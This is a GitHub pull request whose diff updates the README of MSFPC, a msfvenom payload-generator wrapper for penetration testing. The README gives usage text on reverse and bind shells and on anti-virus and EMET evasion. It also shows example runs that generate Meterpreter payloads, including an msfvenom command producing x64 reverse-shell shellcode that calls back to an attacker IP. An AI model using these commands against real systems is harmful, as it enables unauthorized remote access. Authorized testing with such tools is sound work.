Skip to content

Updated shellcode generation and more, v2.1.0 #22

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
madar4uch1a wants to merge 1 commit into
base: master
Choose a base branch
from
Open

Updated shellcode generation and more, v2.1.0 #22

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
179 changes: 105 additions & 74 deletions README.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -62,70 +62,84 @@ root@kali:~# apt install -y msfpc

```
$ bash msfpc.sh -h -v
[*] MSFvenom Payload Creator (MSFPC v1.4.4)

msfpc.sh <TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)
Example: msfpc.sh windows 192.168.1.10 # Windows & manual IP.
msfpc.sh elf bind eth0 4444 # Linux, eth0's IP & manual port.
msfpc.sh stageless cmd py https # Python, stageless command prompt.
msfpc.sh verbose loop eth1 # A payload for every type, using eth1's IP.
msfpc.sh msf batch wan # All possible Meterpreter payloads, using WAN IP.
msfpc.sh help verbose # Help screen, with even more information.

<TYPE>:
+ APK
+ ASP
+ ASPX
+ Bash [.sh]
+ Java [.jsp]
+ Linux [.elf]
+ OSX [.macho]
+ Perl [.pl]
+ PHP
+ Powershell [.ps1]
+ Python [.py]
+ Tomcat [.war]
+ Windows [.exe // .dll]

Rather than putting <DOMAIN/IP>, you can do a interface and MSFPC will detect that IP address.
Missing <DOMAIN/IP> will default to the IP menu.

Missing <PORT> will default to 443.

<CMD> is a standard/native command prompt/terminal to interactive with.
<MSF> is a custom cross platform shell, gaining the full power of Metasploit.
Missing <CMD/MSF> will default to <MSF> where possible.
Note: Metasploit doesn't (yet!) support <CMD/MSF> for every <TYPE> format.
<CMD> payloads are generally smaller than <MSF> and easier to bypass EMET. Limit Metasploit post modules/scripts support.
<MSF> payloads are generally much larger than <CMD>, as it comes with more features.

<BIND> opens a port on the target side, and the attacker connects to them. Commonly blocked with ingress firewalls rules on the target.
<REVERSE> makes the target connect back to the attacker. The attacker needs an open port. Blocked with engress firewalls rules on the target.
Missing <BIND/REVERSE> will default to <REVERSE>.
<BIND> allows for the attacker to connect whenever they wish. <REVERSE> needs to the target to be repeatedly connecting back to permanent maintain access.

<STAGED> splits the payload into parts, making it smaller but dependent on Metasploit.
<STAGELESS> is the complete standalone payload. More 'stable' than <STAGED>.
Missing <STAGED/STAGELESS> will default to <STAGED> where possible.
Note: Metasploit doesn't (yet!) support <STAGED/STAGELESS> for every <TYPE> format.
<STAGED> are 'better' in low-bandwidth/high-latency environments.
<STAGELESS> are seen as 'stealthier' when bypassing Anti-Virus protections. <STAGED> may work 'better' with IDS/IPS.
More information: https://community.rapid7.com/community/metasploit/blog/2015/03/25/stageless-meterpreter-payloads
https://www.offensive-security.com/metasploit-unleashed/payload-types/
https://www.offensive-security.com/metasploit-unleashed/payloads/

<TCP> is the standard method to connecting back. This is the most compatible with TYPES as its RAW. Can be easily detected on IDSs.
<HTTP> makes the communication appear to be HTTP traffic (unencrypted). Helpful for packet inspection, which limit port access on protocol - e.g. TCP 80.
<HTTPS> makes the communication appear to be (encrypted) HTTP traffic using as SSL. Helpful for packet inspection, which limit port access on protocol - e.g. TCP 443.
<FIND_PORT> will attempt every port on the target machine, to find a way out. Useful with stick ingress/engress firewall rules. Will switch to 'allports' based on <TYPE>.
Missing <TCP/HTTP/HTTPS/FIND_PORT> will default to <TCP>.
By altering the traffic, such as <HTTP> and even more <HTTPS>, it will slow down the communication & increase the payload size.
More information: https://community.rapid7.com/community/metasploit/blog/2011/06/29/meterpreter-httphttps-communication

<BATCH> will generate as many combinations as possible: <TYPE>, <CMD + MSF>, <BIND + REVERSE>, <STAGED + STAGLESS> & <TCP + HTTP + HTTPS + FIND_PORT>
<LOOP> will just create one of each <TYPE>.

<VERBOSE> will display more information.
[*] MSFvenom Payload Creator (MSFPC v2.1.0)

Usage: msfpc.sh <TYPE> (<DOMAIN/IP>) (<PORT>) [OPTIONS]

<TYPE>:
+ APK
+ ASP
+ ASPX
+ Bash [.sh]
+ Java [.jsp]
+ Linux [.elf]
+ OSX [.macho]
+ Perl [.pl]
+ PHP
+ Powershell [.ps1]
+ Python [.py]
+ Tomcat [.war]
+ Windows [.exe // .dll]

Options (order doesn't matter):
-c, --cmd Generate command shell (instead of meterpreter)
-m, --meterpreter Generate meterpreter shell (default)
-b, --bind Use bind payload (default reverse)
-r, --reverse Use reverse payload
-s, --staged Use staged payload (default for most)
--stageless Use stageless payload
-t, --tcp Use TCP transport (default)
--http Use HTTP transport
--https Use HTTPS transport
-f, --find-port Use find_port transport (allports)
-e, --encoder <enc> Specify encoder (e.g., x86/shikata_ga_nai)
-A, --arch <arch> Specify payload architecture (x86, x64, armle, etc)
-F, --format <format> Override msfvenom output format (c, python, raw, etc)
-o, --output <dir> Output directory (default current)
-a, --batch Generate all possible combinations
-l, --loop Generate one of each TYPE
-v, --verbose Verbose output
-h, --help Show this help

Rather than putting <DOMAIN/IP>, you can use an interface name and MSFPC will detect that IP address.
Missing <DOMAIN/IP> will default to the IP menu.

Missing <PORT> will default to 443.

<CMD> is a standard/native command prompt/terminal to interact with.
<MSF> is a custom cross‑platform shell, gaining the full power of Metasploit.
Missing <CMD/MSF> will default to <MSF> where possible.
Note: Metasploit doesn't (yet!) support <CMD/MSF> for every <TYPE> format.
<CMD> payloads are generally smaller than <MSF> and easier to bypass EMET; they limit post modules/scripts support.
<MSF> payloads are generally much larger than <CMD>, as they come with more features.

<BIND> opens a port on the target side, and the attacker connects to it; commonly blocked by ingress firewall rules.
<REVERSE> makes the target connect back to the attacker; the attacker must have an open port and outgoing access.
Missing <BIND/REVERSE> will default to <REVERSE>.
<BIND> allows the attacker to connect whenever desired. <REVERSE> needs the target to repeatedly connect back to maintain access.

<STAGED> splits the payload into parts, making it smaller but dependent on Metasploit.
<STAGELESS> is a complete standalone payload; more 'stable' than <STAGED>.
Missing <STAGED/STAGELESS> will default to <STAGED> where possible.
Note: Metasploit doesn't (yet!) support <STAGED/STAGELESS> for every <TYPE> format.
<STAGED> are 'better' in low‑bandwidth/high‑latency environments.
<STAGELESS> are seen as 'stealthier' when bypassing anti‑virus protections. <STAGED> may work 'better' with IDS/IPS.
More information: https://community.rapid7.com/community/metasploit/blog/2015/03/25/stageless-meterpreter-payloads
https://www.offensive-security.com/metasploit-unleashed/payload-types/
https://www.offensive-security.com/metasploit-unleashed/payloads/

<TCP> is the standard method to connect back. This is the most compatible with TYPES as it is raw and easily detected on IDSs.
<HTTP> makes the communication appear to be HTTP traffic (unencrypted). Helpful when packet inspection limits port/protocol use.
<HTTPS> makes the communication appear to be encrypted HTTP traffic (SSL/TLS).
<FIND_PORT> will attempt every port on the target machine to find a way out; switches to 'allports' based on <TYPE>.
Missing <TCP/HTTP/HTTPS/FIND_PORT> will default to <TCP>.
Altering the transport (HTTP/HTTPS) slows communication and increases payload size.
More information: https://community.rapid7.com/community/metasploit/blog/2011/06/29/meterpreter-httphttps-communication

<BATCH> will generate as many combinations as possible: <TYPE>, <CMD + MSF>, <BIND + REVERSE>, <STAGED + STAGLESS> & <TCP + HTTP + HTTPS + FIND_PORT>
<LOOP> will just create one of each <TYPE>.

<VERBOSE> will display more information.
$
```

Expand All @@ -134,7 +148,7 @@ $

```bash
$ bash msfpc.sh windows 192.168.1.10
[*] MSFvenom Payload Creator (MSFPC v1.4.4)
[*] MSFvenom Payload Creator (MSFPC v2.1.0)
[i] IP: 192.168.1.10
[i] PORT: 443
[i] TYPE: windows (windows/meterpreter/reverse_tcp)
Expand All @@ -156,7 +170,7 @@ $

```bash
$ ./msfpc.sh elf bind eth0 4444 verbose
[*] MSFvenom Payload Creator (MSFPC v1.4.4)
[*] MSFvenom Payload Creator (MSFPC v2.1.0)
[i] IP: 192.168.103.142
[i] PORT: 4444
[i] TYPE: linux (linux/x86/shell/bind_tcp)
Expand Down Expand Up @@ -187,7 +201,7 @@ $

```bash
$ msfpc stageless cmd py tcp
[*] MSFvenom Payload Creator (MSFPC v1.4.4)
[*] MSFvenom Payload Creator (MSFPC v2.1.0)

[i] Use which interface - IP address?:
[i] 1.) eth0 - 192.168.103.142
Expand Down Expand Up @@ -218,10 +232,10 @@ _Note: Removed WAN IP._

```bash
$ ./msfpc.sh loop wan
[*] MSFvenom Payload Creator (MSFPC v1.4.4)
[*] MSFvenom Payload Creator (MSFPC v2.1.0)
[i] Loop Mode. Creating one of each TYPE, with default values

[*] MSFvenom Payload Creator (MSFPC v1.4.4)
[*] MSFvenom Payload Creator (MSFPC v2.1.0)
[i] IP: xxx.xxx.xxx.xxx
[i] PORT: 443
[i] TYPE: android (android/meterpreter/reverse_tcp)
Expand All @@ -237,7 +251,7 @@ $ ./msfpc.sh loop wan
[*] Done!


[*] MSFvenom Payload Creator (MSFPC v1.4.4)
[*] MSFvenom Payload Creator (MSFPC v2.1.0)

...SNIP...

Expand All @@ -251,13 +265,30 @@ _Note: Removed WAN IP._

![Examples](https://i.imgur.com/8zPx6p3.png)

## Example \#5 (x64 shellcode)

```bash
$ msfpc windows 10.0.0.1 -A x64 -F c
[*] MSFvenom Payload Creator (MSFPC v2.1.0)
[i] IP: 10.0.0.1
[i] PORT: 443
[i] TYPE: windows/x64/meterpreter/reverse_tcp
[i] CMD: msfvenom -p windows/x64/meterpreter/reverse_tcp -f c \
--platform windows -a x64 LHOST=10.0.0.1 LPORT=443 \
> '/root/windows-x64-meterpreter-reverse-tcp-443.c'

[i] shellcode saved: '/root/windows-x64-meterpreter-reverse-tcp-443.c'

[*] Done!
```

- - -

## New features

## To-Do List
MSFPC now supports:

* Shellcode generation
* x64 payloads
* IPv6 support
* **Shellcode generation** – override the output format with `-F`/`--format` (e.g. `c`, `python`, `raw`, etc.) to receive raw shellcode or language‑specific wrappers.
* **x64 (and other) architectures** – specify `-A`/`--arch` to select payload architecture (e.g. `x64`, `x86`, `armle`, etc.). The payload name will be adjusted accordingly (e.g. `windows/x64/meterpreter/reverse_tcp`).
* IPv6 support (work in progress)
* Look into using OS scripting more _(`powershell_bind_tcp` & `bind_perl` etc)_
Loading